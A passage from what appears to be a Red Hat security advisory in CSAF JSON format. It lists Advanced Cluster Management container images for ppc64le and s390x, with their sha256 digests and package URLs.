"product_id": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-subscription-rhel9@sha256%3Ab3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773090513"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"product_id": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multiclusterhub-rhel9@sha256%3Af9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773145770"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-must-gather-rhel9@sha256%3Af544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773358606"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"product_id": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/node-exporter-rhel9@sha256%3Afc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773680755"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9@sha256%3A6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773185861"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9-operator@sha256%3Accf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233517"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"product_id": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-rhel9@sha256%3A8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773680743"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"product_id": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-alertmanager-rhel9@sha256%3A128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773680634"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-config-reloader-rhel9@sha256%3A0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259208"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-rhel9@sha256%3Af12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259157"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"product_id": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rbac-query-proxy-rhel9@sha256%3Ab2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737262"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"product_id": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/search-collector-rhel9@sha256%3A1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773099472"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-indexer-rhel9@sha256%3Ac033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233417"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-api-rhel9@sha256%3A8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233463"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-rhel9@sha256%3Ab6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233441"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-siteconfig-rhel9@sha256%3Aa33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773639113"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"product_id": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/submariner-addon-rhel9@sha256%3Aa20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259185"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"product_id": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/thanos-rhel9@sha256%3A5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773680856"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"product_id": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/thanos-receive-controller-rhel9@sha256%3A3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773185877"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"product": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"product_id": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/acm-volsync-addon-controller-rhel9@sha256%3A8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498?arch=ppc64le\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773531422"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-cli-rhel9@sha256%3A7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259176"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"product_id": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cert-policy-controller-rhel9@sha256%3Af72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773283045"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"product_id": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/cluster-backup-rhel9-operator@sha256%3A243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773963430"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-cluster-permission-rhel9@sha256%3A59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773285089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"product_id": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"product_identification_helper": {
"purl": "pkg:oci/config-policy-controller-rhel9@sha256%3A0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1772926643"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"product_id": "registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"product_identification_helper": {
"purl": "pkg:oci/console-rhel9@sha256%3A7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259174"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"product_id": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"product_identification_helper": {
"purl": "pkg:oci/endpoint-monitoring-rhel9-operator@sha256%3A8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737268"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-addon-controller-rhel9@sha256%3A519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233435"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-framework-addon-rhel9@sha256%3A1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1772926628"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"product_id": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/governance-policy-propagator-rhel9@sha256%3A488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259158"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-grafana-rhel9@sha256%3A280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774002166"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"product_id": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/grafana-dashboard-loader-rhel9@sha256%3A91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"product_id": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/insights-client-rhel9@sha256%3A8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773099456"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"product_id": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"product_identification_helper": {
"purl": "pkg:oci/insights-metrics-rhel9@sha256%3A5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773531402"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"product_id": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"product_identification_helper": {
"purl": "pkg:oci/klusterlet-addon-controller-rhel9@sha256%3A6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773090422"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"product_id": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-rhel9@sha256%3A33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"product_id": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kube-state-metrics-rhel9@sha256%3A8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259171"
}
}
},
{
"category": "product_version",
